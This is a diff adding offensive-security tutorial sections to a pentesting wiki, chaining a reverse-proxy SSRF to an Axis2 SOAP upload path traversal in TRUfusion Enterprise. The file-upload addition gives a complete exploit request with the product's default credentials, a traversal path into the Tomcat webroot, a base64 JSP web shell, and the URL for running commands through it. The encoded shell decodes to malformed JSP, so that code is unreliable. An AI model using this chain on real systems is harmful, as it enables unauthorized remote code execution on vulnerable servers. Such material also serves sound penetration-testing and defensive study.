When Audits Fail From Pre-Auth SSRF to RCE in TRUfusion Ente...

src/pentesting-web/file-upload/README.md

@@ -301,6 +301,33 @@ Mitigations
 - Canonicalize and enforce that the resolved path stays within an allow-listed base directory.
 - Store uploads on a non-executable volume and deny script execution from writable paths.
 
+### Axis2 SOAP uploadFile traversal to Tomcat webroot (JSP drop)
+
+Axis2-based upload services sometimes expose an `uploadFile` SOAP action that takes three attacker-controlled fields: `jobDirectory` (destination directory), `archiveName` (filename), and `dataHandler` (base64 file content). If `jobDirectory` is not canonicalized, you get arbitrary file write via path traversal and can land a JSP in Tomcat’s webapps.
+
+Minimal request outline (default creds often work: `admin` / `trubiquity`):
+
+```http
+POST /services/WsPortalV6UpDwAxis2Impl HTTP/1.1
+Host: 127.0.0.1
+Content-Type: text/xml
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:updw="http://updw.webservice.ddxPortalV6.ddxv6.procaess.com">
+  <soapenv:Body>
+    <updw:uploadFile>
+      <updw:login>admin</updw:login>
+      <updw:password>trubiquity</updw:password>
+      <updw:archiveName>shell.jsp</updw:archiveName>
+      <updw:jobDirectory>/../../../../opt/TRUfusion/web/tomcat/webapps/trufusionPortal/jsp/</updw:jobDirectory>
+      <updw:dataHandler>PD8lQCBwYWdlIGltcG9ydD0iamF2YS5pby4qIjsgc3lzdGVtKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSk7Pz4=</updw:dataHandler>
+    </updw:uploadFile>
+  </soapenv:Body>
+</soapenv:Envelope>
+```
+
+- Bindings are often localhost-only; pair with a full-read SSRF (absolute-URL request line, Host header ignored) to reach `127.0.0.1` if the Axis2 port isn’t exposed.
+- After writing, browse to `/trufusionPortal/jsp/shell.jsp?cmd=id` to execute.
+
 ## Tools
 
 - [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
@@ -570,5 +597,6 @@ Backend copies `file.filepath`, so the response returns that path’s content. C
 - [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
 - [Microsoft – mklink (command reference)](https://learn.microsoft.com/windows-server/administration/windows-commands/mklink)
 - [0xdf – HTB: Certificate (ZIP NUL-name and stacked ZIP parser confusion → PHP RCE)](https://0xdf.gitlab.io/2025/10/04/htb-certificate.html)
+- [When Audits Fail: From Pre-Auth SSRF to RCE in TRUfusion Enterprise](https://www.rcesecurity.com/2026/02/when-audits-fail-from-pre-auth-ssrf-to-rce-in-trufusion-enterprise/)
 
 {{#include ../../banners/hacktricks-training.md}}

src/pentesting-web/ssrf-server-side-request-forgery/README.md

@@ -309,6 +309,26 @@ Host: target.com
 Connection: close
 ```
 
+### Reverse proxies that accept absolute URLs in the request line (open forward-proxy)
+
+Some reverse proxies also accept **absolute-form request lines** (`GET http://10.0.0.5:8080/path HTTP/1.1`) and forward the URL as-is to a backend instead of rejecting it or rewriting it to the configured upstream. This turns the reverse proxy into a **pre-auth forward proxy with full-read SSRF**, including access to `localhost`-bound services that would normally be unreachable from the Internet.
+
+Key points:
+- **Request line controls destination**: the authority in the absolute URL overrides normal routing; the `Host` header is usually ignored.
+- **Full response returned**: responses from internal hosts are streamed back, so you can enumerate and interact (e.g., SOAP/Axis2, Keycloak, admin consoles) rather than blind-probing.
+- **Works on localhost**: `GET http://127.0.0.1:port/ HTTP/1.1\r\nHost: public-host\r\n\r\n` is enough to hit loopback-only listeners.
+- **Abuse as pivot**: combine with other vulns (e.g., upload endpoints) to reach intra-host services.
+
+Minimal probe:
+
+```http
+GET http://127.0.0.1:8080/ HTTP/1.1
+Host: whatever
+Connection: close
+```
+
+If you see the upstream response instead of a 400, the appliance is acting as an open proxy.
+
 ## DNS Rebidding CORS/SOP bypass
 
 If you are having **problems** to **exfiltrate content from a local IP** because of **CORS/SOP**, **DNS Rebidding** can be used to bypass that limitation:
@@ -471,5 +491,6 @@ https://github.com/incredibleindishell/SSRF_Vulnerable_Lab
 - [Positive Technologies – Blind Trust: What Is Hidden Behind the Process of Creating Your PDF File?](https://swarm.ptsecurity.com/blind-trust-what-is-hidden-behind-the-process-of-creating-your-pdf-file/)
 - [Tenable – SSRF Vulnerability in Java TLS Handshakes That Creates DoS Risk](https://www.tenable.com/blog/tenable-discovers-ssrf-vulnerability-in-java-tls-handshakes-that-creates-dos-risk)
 - [RFC 5280 §4.2.2.1 Authority Information Access](https://datatracker.ietf.org/doc/html/rfc5280#section-4.2.2.1)
+- [When Audits Fail: From Pre-Auth SSRF to RCE in TRUfusion Enterprise](https://www.rcesecurity.com/2026/02/when-audits-fail-from-pre-auth-ssrf-to-rce-in-trufusion-enterprise/)
 
 {{#include ../../banners/hacktricks-training.md}}